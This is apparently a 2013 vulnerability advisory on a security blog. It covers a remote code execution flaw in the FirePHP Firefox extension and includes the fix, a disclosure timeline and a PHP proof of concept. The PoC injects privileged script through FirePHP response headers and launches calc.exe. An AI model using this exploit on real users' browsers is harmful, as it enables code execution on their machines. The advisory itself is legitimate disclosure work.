Just Another Hacker
Author's avatar

FirePHP firefox plugin remote code execution

FirePHP enables you to log to your Firebug Console using a simple PHP method call. All data is sent via response headers and will not interfere with the content on your page. FirePHP is ideally suited for AJAX development where clean JSON and XML responses are required. [ Taken from: http://www.firephp.org/ ]

Vulnerability description

The extension does not sufficiently validate cell names in array data received from the remote host resulting in arbitrary script execution in the chrome privileged context if a user inspects the malicious data in firephp.

  • Discovered by: Eldar “Wireghoul” Marcussen
  • Vendor: FirePHP - http://www.firephp.org/
  • Affected versions: All versions prior to 0.7.2

Proof of Concept

<?php
            /*************************************************************
             * FirePHP Firefox plugin RCE PoC                            *
             * Written by Wireghoul - http://www.justanotherhacker.com   *
             * Greetz to @bcoles urbanadventurer @malerisch              *
             *************************************************************/
            
            // XUL code to launch calc.exe
            $exploit =  '{"RequestHeaders":{"1":"1","2":"2","3":"3","4":"4","5":"5","6":"6","7":"7","8":"8","9":"9","UR<script>';
            $exploit.= 'var lFile=Components.classes[\"@mozilla.org/file/local;1\"].createInstance(Components.interfaces.nsILocalFile);';
            $exploit.= 'lFile.initWithPath(\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\calc.exe\");';
            $exploit.= 'var process=Components.classes[\"@mozilla.org/process/util;1\"].createInstance(Components.interfaces.nsIProcess);';
            $exploit.= 'process.init(lFile);';
            $exploit.= 'process.run(true,[],0);void(0);';
            $exploit.= '<\/SCRIPT>":"PWNT"}}';
            
            // Send FirePHP dump data
            header("X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2");
            header("X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3");
            header("X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1");
            $payload= "X-Wf-1-1-1-1: ";
            $payload.= strlen($exploit).'|'.$exploit."|\r\n";
            header($payload);
            ?>
            <html>
            <head>
              <title>FirePHP Firefox plugin RCE PoC</title>
            </head>
            <body>
            PWNT!
            </body>
            </html>

Solution

Upgrade to version 0.7.2

Disclosure time line

  • 17-Apr-2013 - Public disclosure
  • 17-Apr-2013 - New version available via mozilla addons
  • 12-Apr-2013 - New version
  • 12-Apr-2013 - Vendor acknowledge vulnerability
  • 09-Apr-2013 - Vendor notified through email

graudit

Static source code analysis tool for finding vulnerabilities in source code.

htshells

Self contained attacks against per directory configuration in web servers.

PHP omelette

Code obfuscation tool for bypassing web application firewalls.

More

All of the project information on one page!